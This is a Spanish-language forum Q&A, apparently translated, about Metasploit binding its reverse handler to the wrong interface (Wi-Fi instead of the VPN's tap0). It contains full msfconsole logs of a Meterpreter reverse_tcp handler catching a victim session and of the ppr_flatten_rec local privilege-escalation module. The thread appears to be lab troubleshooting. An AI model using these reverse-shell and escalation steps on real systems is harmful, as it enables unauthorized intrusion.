Metasploit usando la dirección LHOST incorrecta

Navega tus respuestas
1

Cuando uso metasploit en Kali Linux versión actualizada hasta la fecha, cuando uso exploit / multi / handler con windows / meterpreter / reverse_tcp y exploits locales sobre meterpreter, el El campo LHOST se cambia automáticamente a la interfaz IP Wi-Fi, cuando en realidad quiero usar tap0, que es la interfaz VPN.

He intentado resolver el problema con: 

set LHOST <tap0 IP>
setg LHOST <tap0 IP>
set INTERFACE tap0
setg INTERFACE tap0
set interface tap0
set interface tap0

Pero luego, al usar el comando ejecutar , la víctima intenta conectarse a mi IP Wi-Fi, que obviamente no es accesible desde la VPN.

He tenido este problema durante al menos 6 meses, independientemente de cuándo actualice Kali o metasploit. Aprecio si alguien sabe cuál es la forma correcta de configurar metasploit.

[Editar: Más detalles]

Ejemplo del problema:

msf exploit(windows/local/ppr_flatten_rec) > set SESSION 1 SESSION => 1 msf exploit(windows/local/ppr_flatten_rec) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(windows/local/ppr_flatten_rec) > run [*] Started reverse TCP handler on 192.168.85.158:4444

Todo el contexto es: 

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.1:443 
[*] Sending stage (179779 bytes) to 192.168.22.55
[*] Meterpreter session 1 opened (192.168.0.1:443 -> 192.168.22.55:49202) at 2018-01-10 23:27:30 -0500

meterpreter > 
Background session 1? [y/N]  

msf exploit(multi/handler) > use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) > show options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(windows/local/ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ppr_flatten_rec) > set LHOST **192.168.0.1**
LHOST => 192.168.0.1
msf exploit(windows/local/ppr_flatten_rec) > run

[*] Started reverse TCP handler on **192.168.85.158**:4444 
[-] Exploit aborted due to failure: not-vulnerable: Exploit not available on this system.
[*] Exploit completed, but no session was created.
msf exploit(windows/local/ppr_flatten_rec) > show options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.85.158   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
    
pregunta Kali User 11.01.2018 - 15:56
fuente

1 respuesta

0

La solución a mi problema se explicó en los comentarios de Mukesh (muchas gracias a Schroeder por tener tiempo para ayudarme a estructurar mejor la pregunta). La solución es set PAYLOAD nuevamente antes de cada vulnerabilidad local que vaya a utilizar. 

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.0.1:4444 
[*] Sending stage (847604 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.158:57772) at 2018-01-11 16:30:40 -0500

meterpreter > background 
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ppr_flatten_rec
msf exploit(ppr_flatten_rec) > set PAYLOAD windows/meterpreter/reverse_tcp  <------- [previously this was missing]
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ppr_flatten_rec) > show options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ppr_flatten_rec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ppr_flatten_rec) > set LPORT 4445
LPORT => 4445
msf exploit(ppr_flatten_rec) > show options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.1     yes       The listen address
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(ppr_flatten_rec) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.1:4445  <----- [Now the IP is the correct one]
    
respondido por el Kali User 11.01.2018 - 22:46
fuente

Lea otras preguntas en las etiquetas

Protegiendo tokens de datos [duplicado] ¿Por qué esta ejecución de código de shell se considera un exploit?